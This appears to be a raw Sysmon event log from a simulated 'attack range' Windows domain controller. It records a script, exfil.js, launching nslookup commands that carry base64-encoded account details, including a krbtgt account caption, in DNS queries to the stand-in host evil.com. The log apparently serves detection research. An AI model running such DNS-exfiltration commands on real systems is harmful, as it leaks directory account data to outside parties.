14:21:56.573{2E1864BB-18E0-629A-6742-000000005F02}39767024C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-F346-000000005F02}5692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.586{2E1864BB-1904-629A-F346-000000005F02}5692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnapgrf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.573{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltzb.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.557{2E1864BB-1904-629A-F146-000000005F02}23886996C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F246-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.557{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.557{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.542{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.542{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F246-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.542{2E1864BB-1904-629A-F046-000000005F02}54403168C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-F246-000000005F02}7868C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.554{2E1864BB-1904-629A-F246-000000005F02}7868C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-F046-000000005F02}5440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltzb.tmp 2>&1 10341000x8000000000000000217206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.526{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F146-000000005F02}2388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.526{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-F146-000000005F02}2388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.526{2E1864BB-1904-629A-F146-000000005F02}23886996C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F046-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.510{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F146-000000005F02}2388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.507{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.506{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F046-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.506{2E1864BB-18E0-629A-6742-000000005F02}39767080C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-F046-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.506{2E1864BB-1904-629A-F046-000000005F02}5440C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltzb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.489{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljutbqc.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-1904-629A-EE46-000000005F02}38607656C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-EF46-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-EF46-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.473{2E1864BB-1904-629A-ED46-000000005F02}17367712C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-EF46-000000005F02}3596C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.478{2E1864BB-1904-629A-EF46-000000005F02}3596C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-ED46-000000005F02}1736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljutbqc.tmp 2>&1 10341000x8000000000000000217186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 